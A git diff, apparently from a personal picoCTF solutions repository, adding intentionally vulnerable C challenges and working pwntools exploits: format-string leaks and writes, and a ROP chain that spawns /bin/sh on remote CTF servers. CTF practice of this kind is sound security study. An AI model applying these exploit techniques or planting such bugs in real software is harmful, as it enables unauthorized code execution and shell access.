+log.info(f"writing lower byte value to {hex(lower_byte_value)} on enter with string {lower_byte_writer}")
+write_lower_byte = conn.sendline(lower_byte_writer)
+
+upper_byte_writer = produce_writer(upper_byte_value, p64(stack_address_ret+1), offset=2)
+log.info(f"writing upp byte value to {hex(upper_byte_value)} on enter with string {upper_byte_writer}")
+write_upper_byte = conn.sendline(upper_byte_writer)
+
+conn.sendline(b"exit")
+conn.recvuntil(b"The Valley Disappears\n")
+rest = conn.recvall()
+log.info(f"got {rest}")
+

echo_valley/valley.c

@@ -0,0 +1,49 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+void print_flag() {
+    char buf[32];
+    FILE *file = fopen("/home/valley/flag.txt", "r");
+
+    if (file == NULL) {
+      perror("Failed to open flag file");
+      exit(EXIT_FAILURE);
+    }
+    
+    fgets(buf, sizeof(buf), file);
+    printf("Congrats! Here is your flag: %s", buf);
+    fclose(file);
+    exit(EXIT_SUCCESS);
+}
+
+void echo_valley() {
+    printf("Welcome to the Echo Valley, Try Shouting: \n");
+
+    char buf[100];
+
+    while(1)
+    {
+        fflush(stdout);
+        if (fgets(buf, sizeof(buf), stdin) == NULL) {
+          printf("\nEOF detected. Exiting...\n");
+          exit(0);
+        }
+
+        if (strcmp(buf, "exit\n") == 0) {
+            printf("The Valley Disappears\n");
+            break;
+        }
+
+        printf("You heard in the distance: ");
+        printf(buf);
+        fflush(stdout);
+    }
+    fflush(stdout);
+}
+
+int main()
+{
+    echo_valley();
+    return 0;
+}

flag_leak/.gdb_history

@@ -0,0 +1,2 @@
+disassemble main
+exit

flag_leak/sol.py

@@ -0,0 +1,29 @@
+#!/usr/bin/env python
+from pwn import *
+
+buffer_size = 127
+hex_to_read = 127//2
+hex_reader = b'%x'*hex_to_read
+payload = hex_reader + b'.'
+log.info(f"payload: {payload}")
+
+def endian_swap(s, offset=0):
+    result = b''
+    for i in range(3+offset, len(s), 4):
+        result += bytes(reversed(s[i-3:i+1]))
+    return result
+
+conn = remote("saturn.picoctf.net", 65206)
+
+conn.recvuntil(b" >> ")
+conn.sendline(payload)
+conn.recvline()
+data = conn.recvline(keepends=False)[:-1]
+log.info(f"received data: {data}")
+unhexed_data = unhex(data)
+for i in range(4):
+    endian_swapped_data = endian_swap(unhexed_data, offset=i)
+    if b"picoCTF" in endian_swapped_data:
+        break
+log.info(f"processed data: {endian_swapped_data}")
+

flag_leak/vuln.c

@@ -0,0 +1,46 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <wchar.h>
+#include <locale.h>
+
+#define BUFSIZE 64
+#define FLAGSIZE 64
+
+void readflag(char* buf, size_t len) {
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,len,f); // size bound read
+}
+
+void vuln(){
+   char flag[BUFSIZE];
+   char story[128];
+
+   readflag(flag, FLAGSIZE);
+
+   printf("Tell me a story and then I'll tell you one >> ");
+   scanf("%127s", story);
+   printf("Here's a story - \n");
+   printf(story);
+   printf("\n");
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  
+  // Set the gid to the effective gid
+  // this prevents /bin/sh from dropping the privileges
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+  vuln();
+  return 0;
+}

flag_printer/flag_printer.py

@@ -1,28 +0,0 @@
-#!/usr/bin/env python3
-import galois
-import numpy as np
-MOD = 7514777789
-
-points = []
-
-for line in open('encoded.txt', 'r').read().strip().split('\n'):
-    x, y = line.split(' ')
-    points.append((int(x), int(y)))
-
-GF = galois.GF(MOD)
-print(GF.properties)
-
-matrix = []
-solution = []
-for point in points:
-    x, y = point
-    solution.append(GF(y % MOD))
-
-    row = []
-    for i in range(3):
-        row.append(GF((x ** i) % MOD))
-    
-    matrix.append(GF(row))
-
-print('solving')
-open('output.bmp', 'wb').write(bytearray(np.linalg.lstsq(GF(matrix), GF(solution)).tolist()[:-1]))

flag_printer/sol.py

@@ -1,31 +0,0 @@
-#!/usr/bin/env python3
-from sage.all import *
-MOD = 7514777789
-
-ring=GF(MOD)
-
-points = []
-for line in open('encoded.txt', 'r').read().strip().split('\n'):
-    x, y = line.split(' ')
-    points.append((int(x), int(y)))
-
-print("building matrices")
-
-solution = []
-M = []
-for point in points:
-    x, y = point
-    solution.append(ring(y % MOD))
-
-    row = []
-    for i in range(3):
-        row.append(pow(x, i, MOD))
-    M.append(row)
-
-print("converting matrices")
-
-solution = vector(solution)
-M = Matrix(M, base_ring=GF(MOD))
-
-print('solving')
-open('output.bmp', 'wb').write(bytearray(M.solve_right(solution).tolist()[:-1]))

guessing_game_1/.gdb_history

@@ -0,0 +1,60 @@
+disassemble main
+disassemble increment 
+disassemble get_random 
+exit
+cyclic
+cyclic 100
+cyclic 200
+cyclic 360
+cyclic zaaa
+cyclic zaaaaa
+cyclic help
+cyclic -l bdaaaaaa
+cyclic -l aaaaaa
+cyclic -l aaaaaaaa
+cyclic -l aaaaaaab
+r
+r
+cyclic -l 0x6161616161616170
+disassemble main
+exit
+c
+c
+c
+c
+c
+c
+c
+c
+disassemble win
+b *win+49
+c
+exit
+b *win+49
+c
+stackf
+stackf help
+stackf -h
+stackf 100
+hexdump $sp 200
+nexti
+stackf
+nexti
+c
+hexdump *bss
+vmmap
+hexdump 0x6b7000
+hexdump 0x6bd000
+hexdump 7062432
+nexti
+b *win+49
+c
+nexti
+hexdump 7062432
+c
+nexti
+c
+b *win+49
+c
+c
+nexti

guessing_game_1/Makefile.share

@@ -0,0 +1,5 @@
+all:
+	gcc -m64 -fno-stack-protector -O0 -no-pie -static -o vuln vuln.c
+
+clean:
+	rm vuln

guessing_game_1/get_random_numbers.py

@@ -0,0 +1,28 @@
+#!/usr/bin/env python
+from pwn import *
+
+n = 6
+values = []
+p = log.progress(f"bruteforcing {n} random numbers")
+while len(values) < n:
+    for i in range(100):
+        with context.quiet:
+            conn = process("./vuln")
+        conn.recvline()
+        for v in values:
+            conn.recvuntil(b"guess?")
+            conn.sendline(str(v).encode())
+            conn.sendline(b"0")
+        p.status(f"i = {i:03}, {values}...")
+        conn.recvuntil(b"guess?")
+        conn.sendline(str(i+1).encode())
+        conn.recvline()
+        result = conn.recvline()
+        with context.quiet:
+            conn.close()
+        if b"win" in result:
+            values.append(i+1)
+            break
+
+p.success(f"values are {values}")
+

guessing_game_1/sol.py

@@ -0,0 +1,58 @@
+#!/usr/bin/env python
+from pwn import *
+# https://cyb3rwhitesnake.medium.com/picoctf-guessing-game-1-pwn-bdc1c87016f9
+context.terminal = "kitty"
+
+numbers = [84, 87, 78, 16, 94, 36] # -> brute-forcing script
+
+elf = ELF("./vuln")
+rop = ROP(elf)
+pop_rdi = rop.rdi.address
+pop_rsi = rop.rsi.address
+pop_rdx = rop.rdx.address
+pop_rax = rop.rax.address
+syscall = rop.syscall.address
+bss = elf.bss()
+read = elf.functions['read'].address
+main = elf.functions['main'].address
+
+ret_offset = 120
+
+conn = remote("shape-facility.picoctf.net", 50780)
+#conn = process("./vuln")
+#attach(conn)
+
+conn.recvuntil(b"guess?")
+conn.sendline(str(numbers[0]).encode())
+conn.recvuntil(b"Name?")
+
+# call read: read(int fd -> rdi, void buf[count] -> rsi, size_t count -> rdx)
+# read(stdin/0, bss, 12)
+log.info(f"sending read payload")
+payload = cyclic(ret_offset, n=8)
+payload += p64(pop_rdi) + p64(0)
+payload += p64(pop_rsi) + p64(bss)
+payload += p64(pop_rdx) + p64(12)
+payload += p64(read)
+payload += p64(main)
+conn.sendline(payload)
+conn.sendline(b"/bin/sh\x00")
+
+conn.recvuntil(b"guess?")
+conn.sendline(str(numbers[1]).encode())
+conn.recvuntil(b"Name?")
+
+# call /bin/sh: sys_execve(59), rdi: char *filename, rsi: char *argv, rdx: char *envp
+# sys_execve(bss, NULL/0, NULL/0)
+log.info(f"calling execve")
+payload = cyclic(ret_offset, n=8)
+payload += p64(pop_rax) + p64(59)
+payload += p64(pop_rdi) + p64(bss)
+payload += p64(pop_rsi) + p64(0)
+payload += p64(pop_rdx) + p64(0)
+payload += p64(syscall)
+conn.sendline(payload)
+
+conn.recvline()
+conn.interactive()
+

guessing_game_1/vuln.c

@@ -0,0 +1,67 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+
+#define BUFSIZE 100
+
+
+long increment(long in) {
+	return in + 1;
+}
+
+long get_random() {
+	return rand() % BUFSIZE;
+}
+
+int do_stuff() {
+	long ans = get_random();
+	ans = increment(ans);
+	int res = 0;
+	
+	printf("What number would you like to guess?\n");
+	char guess[BUFSIZE];
+	fgets(guess, BUFSIZE, stdin);
+	
+	long g = atol(guess);
+	if (!g) {
+		printf("That's not a valid number!\n");
+	} else {
+		if (g == ans) {
+			printf("Congrats! You win! Your prize is this print statement!\n\n");
+			res = 1;
+		} else {
+			printf("Nope!\n\n");
+		}
+	}
+	return res;
+}
+
+void win() {
+	char winner[BUFSIZE];
+	printf("New winner!\nName? ");
+	fgets(winner, 360, stdin);
+	printf("Congrats %s\n\n", winner);
+}
+
+int main(int argc, char **argv){
+	setvbuf(stdout, NULL, _IONBF, 0);
+	// Set the gid to the effective gid
+	// this prevents /bin/sh from dropping the privileges
+	gid_t gid = getegid();
+	setresgid(gid, gid, gid);
+	
+	int res;
+	
+	printf("Welcome to my guessing game!\n\n");
+	
+	while (1) {
+		res = do_stuff();
+		if (res) {
+			win();
+		}
+	}
+	
+	return 0;
+}

mob_psycho/flag.txt

@@ -1 +0,0 @@
-7069636f4354467b6178386d433052553676655f4e5838356c346178386d436c5f35653637656135657d

mob_psycho/mobpsycho/META-INF/androidx.activity_activity.version

@@ -1 +0,0 @@
-1.6.0

mob_psycho/mobpsycho/META-INF/androidx.annotation_annotation-experimental.version

@@ -1 +0,0 @@
-1.3.0

mob_psycho/mobpsycho/META-INF/androidx.appcompat_appcompat-resources.version

@@ -1 +0,0 @@
-1.6.1

mob_psycho/mobpsycho/META-INF/androidx.appcompat_appcompat.version

@@ -1 +0,0 @@
-1.6.1

mob_psycho/mobpsycho/META-INF/androidx.arch.core_core-runtime.version

@@ -1 +0,0 @@
-2.1.0

mob_psycho/mobpsycho/META-INF/androidx.cardview_cardview.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/androidx.coordinatorlayout_coordinatorlayout.version

@@ -1 +0,0 @@
-1.1.0

mob_psycho/mobpsycho/META-INF/androidx.core_core-ktx.version

@@ -1 +0,0 @@
-1.9.0

mob_psycho/mobpsycho/META-INF/androidx.core_core.version

@@ -1 +0,0 @@
-1.9.0

mob_psycho/mobpsycho/META-INF/androidx.cursoradapter_cursoradapter.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/androidx.customview_customview.version

@@ -1 +0,0 @@
-1.1.0

mob_psycho/mobpsycho/META-INF/androidx.documentfile_documentfile.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/androidx.drawerlayout_drawerlayout.version

@@ -1 +0,0 @@
-1.1.1

mob_psycho/mobpsycho/META-INF/androidx.dynamicanimation_dynamicanimation.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/androidx.emoji2_emoji2-views-helper.version

@@ -1 +0,0 @@
-1.2.0

mob_psycho/mobpsycho/META-INF/androidx.emoji2_emoji2.version

@@ -1 +0,0 @@
-1.2.0

mob_psycho/mobpsycho/META-INF/androidx.fragment_fragment.version

@@ -1 +0,0 @@
-1.3.6

mob_psycho/mobpsycho/META-INF/androidx.interpolator_interpolator.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/androidx.legacy_legacy-support-core-utils.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/androidx.lifecycle_lifecycle-livedata-core.version

@@ -1 +0,0 @@
-2.5.1

mob_psycho/mobpsycho/META-INF/androidx.lifecycle_lifecycle-livedata.version

@@ -1 +0,0 @@
-2.0.0

mob_psycho/mobpsycho/META-INF/androidx.lifecycle_lifecycle-process.version

@@ -1 +0,0 @@
-2.4.1

mob_psycho/mobpsycho/META-INF/androidx.lifecycle_lifecycle-runtime.version

@@ -1 +0,0 @@
-2.5.1

mob_psycho/mobpsycho/META-INF/androidx.lifecycle_lifecycle-viewmodel-savedstate.version

@@ -1 +0,0 @@
-2.5.1

mob_psycho/mobpsycho/META-INF/androidx.lifecycle_lifecycle-viewmodel.version

@@ -1 +0,0 @@
-2.5.1

mob_psycho/mobpsycho/META-INF/androidx.loader_loader.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/androidx.localbroadcastmanager_localbroadcastmanager.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/androidx.print_print.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/androidx.recyclerview_recyclerview.version

@@ -1 +0,0 @@
-1.1.0

mob_psycho/mobpsycho/META-INF/androidx.savedstate_savedstate.version

@@ -1 +0,0 @@
-1.2.0

mob_psycho/mobpsycho/META-INF/androidx.startup_startup-runtime.version

@@ -1 +0,0 @@
-1.1.1

mob_psycho/mobpsycho/META-INF/androidx.tracing_tracing.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/androidx.transition_transition.version

@@ -1 +0,0 @@
-1.2.0

mob_psycho/mobpsycho/META-INF/androidx.vectordrawable_vectordrawable-animated.version

@@ -1 +0,0 @@
-1.1.0

mob_psycho/mobpsycho/META-INF/androidx.vectordrawable_vectordrawable.version

@@ -1 +0,0 @@
-1.1.0

mob_psycho/mobpsycho/META-INF/androidx.versionedparcelable_versionedparcelable.version

@@ -1 +0,0 @@
-1.1.1

mob_psycho/mobpsycho/META-INF/androidx.viewpager2_viewpager2.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/androidx.viewpager_viewpager.version

@@ -1 +0,0 @@
-1.0.0

mob_psycho/mobpsycho/META-INF/com.google.android.material_material.version

@@ -1 +0,0 @@
-1.5.0